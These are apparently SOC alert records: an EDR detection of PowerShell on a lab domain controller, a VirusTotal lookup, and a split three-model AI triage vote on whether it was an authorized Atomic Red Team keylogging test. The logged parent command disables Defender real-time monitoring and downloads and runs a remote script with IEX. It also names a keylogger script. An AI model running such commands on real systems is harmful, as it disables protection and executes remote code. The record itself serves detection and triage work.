{
  "author": "_ext-snapattack-bef4337c-2507-4428-bce6-8021ba80d7c4[bulk][segment]",
  "cat": "Malicious PowerShell Commandlets - ProcessCreation",
  "detect": {
    "event": {
      "COMMAND_LINE": "\"powershell.exe\" \u0026 {if (Test-Path \\\"\"C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1\\\"\") {exit 0} else {exit 1}}",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 40960,
      "PARENT": {
        "BASE_ADDRESS": 140694944940032,
        "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1056.001 -CheckPrereqs ; Invoke-AtomicTest T1056.001 -GetPrereqs ; Invoke-AtomicTest T1056.001 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
        "MEMORY_USAGE": 193449984,
        "PARENT_ATOM": "0c13305cb3f73d15515e789969c2a835",
        "PARENT_PROCESS_ID": 2440,
        "PROCESS_ID": 3164,
        "THIS_ATOM": "6b593eddb775332b5050941f69c2a838",
        "THREADS": 32,
        "TIMESTAMP": 1774364726507,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 3164,
      "PROCESS_ID": 9152,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "827f395b-c68d-4fac-9c3e-919833d5349d",
      "event_time": 1774364762714,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 1224,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "6b593eddb775332b5050941f69c2a838",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "de7904f7b26fa572efe4a73369c2a85b"
    }
  },
  "detect_id": "ec0d5b47-ab4f-4fe4-ac6b-e7b469c2a85b",
  "detect_mtd": {
    "author": "Nasreddine Bencherchali (Nextron Systems)",
    "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks",
    "falsepositives": [
      "Unknown"
    ],
    "level": "high",
    "references": [
      "https://adsecurity.org/?p=2921",
      "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries",
      "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1",
      "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1",
      "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1",
      "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1",
      "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/",
      "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/",
      "https://github.com/calebstewart/CVE-2021-1675",
      "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1",
      "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html",
      "https://github.com/HarmJ0y/DAMP",
      "https://github.com/samratashok/nishang",
      "https://github.com/DarkCoderSc/PowerRunAsSystem/",
      "https://github.com/besimorhino/powercat",
      "https://github.com/Kevin-Robertson/Powermad",
      "https://github.com/adrecon/ADRecon",
      "https://github.com/adrecon/AzureADRecon",
      "https://github.com/sadshade/veeam-creds/blob/6010eaf31ba41011b58d6af3950cffbf6f5cea32/Veeam-Get-Creds.ps1"
    ],
    "snapattack_analytic_guid": "d48d9380-c5ae-495a-9274-c5fbdeb10e15",
    "tags": [
      "attack.execution",
      "attack.discovery",
      "attack.t1482",
      "attack.t1087",
      "attack.t1087.001",
      "attack.t1087.002",
      "attack.t1069.001",
      "attack.t1069.002",
      "attack.t1069",
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364763939,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364762\u0026selected=de7904f7b26fa572efe4a73369c2a85b",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "827f395b-c68d-4fac-9c3e-919833d5349d",
    "event_time": 1774364762714,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 1224,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "6b593eddb775332b5050941f69c2a838",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "de7904f7b26fa572efe4a73369c2a85b"
  },
  "rule_tags": [
    "ext:ext-snapattack",
    "attack.execution",
    "attack.discovery",
    "attack.t1482",
    "attack.t1087",
    "attack.t1087.001",
    "attack.t1087.002",
    "attack.t1069.001",
    "attack.t1069.002",
    "attack.t1069",
    "attack.t1059.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "managed.Malicious PowerShell Commandlets - ProcessCreation",
  "ts": 1774364764000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.85,
  "false_positive_reason": "Authorized Testing",
  "investigation_questions": [
    "Is this host part of a security testing or CI/CD validation environment?",
    "Was there an authorized penetration test or Red Team exercise active during this window?"
  ],
  "ioc_analysis": "The powershell.exe binary is a legitimate Microsoft-signed system file. The file paths and scripts involved are part of the Atomic Red Team framework (C:\\AtomicRedTeam), indicating authorized security testing rather than malicious intent.",
  "iocs_extracted": [
    "C:\\AtomicRedTeam\\atomics\\T1056.001\\src\\Get-Keystrokes.ps1"
  ],
  "mitre_techniques": [
    "T1056.001"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (split)",
    "Confirm that Atomic Red Team testing was scheduled for this host.",
    "No further remediation is required if testing was authorized."
  ],
  "risk_score": 57,
  "severity": "high",
  "summary": "**Vote: SPLIT (1/3 -\u003e SUSPICIOUS)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** benign | **Confidence:** 1.0\nThe detection was triggered by an Atomic Red Team simulation for technique T1056.001 (Input Capture: Keylogging). The process is part of a security validation test, as evidenced by the parent process installing the Atomic Red Team framework and the command line checking for the presence of the \u0027Get-Keystrokes.ps1\u0027 test script.\n\n**IOC Analysis:** The powershell.exe binary is a legitimate Microsoft-signed system file. The file paths and scripts involved are part of the Atomic Red Team framework (C:\\AtomicRedTeam), indicating authorized security testing rather than malicious intent.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a high-confidence malicious execution of Atomic Red Team (ART) payloads under SYSTEM privileges. The command line explicitly invokes IEX to download and execute remote scripts from GitHub, bypassing security controls.\n\n**IOC Analysis:** The process is running PowerShell.exe from its expected location in System32, which is legitimate for the binary itself. However, the command line arguments contain malicious logic: downloading and executing a script from an external URL (IEX), disabling real-time monitoring, and invoking Atomic Red Team tests targeting T1056.001 (Keylogging). The presence of \u0027Install-PackageProvider\u0027, \u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027, and remote execution confirms this is not benign.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.6\nThe detection event involves a PowerShell process running as NT AUTHORITY\\SYSTEM with a suspicious command line checking for a credential access script. While the file path and hash are legitimate, the elevated privileges and commands suggest potential malicious intent or a red team exercise.\n\n**IOC Analysis:** The FILE_PATH is a legitimate PowerShell executable in the System32 directory, which is expected for system binaries. The HASH is signed, indicating it\u0027s likely Microsoft-signed. However, the COMMAND_LINE contains checks for a script associated with OS credential access (T1056), and the execution as SYSTEM raises concerns. The PARENT_PROCESS shows additional suspicious commands, such as disabling antivirus and installing packages from external sources.",
  "verdict": "suspicious",
  "voting": {
    "auto_action": "manual_review",
    "mode": "split",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: benign (low, 100% confidence)",
      "qwen3.5:4b: true_positive (high, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 60% confidence)"
    ],
    "votes": [
      {
        "confidence": 1.0,
        "model": "gemini-cli",
        "verdict": "benign"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.6,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 1,
    "winning_verdict": "suspicious"
  }
}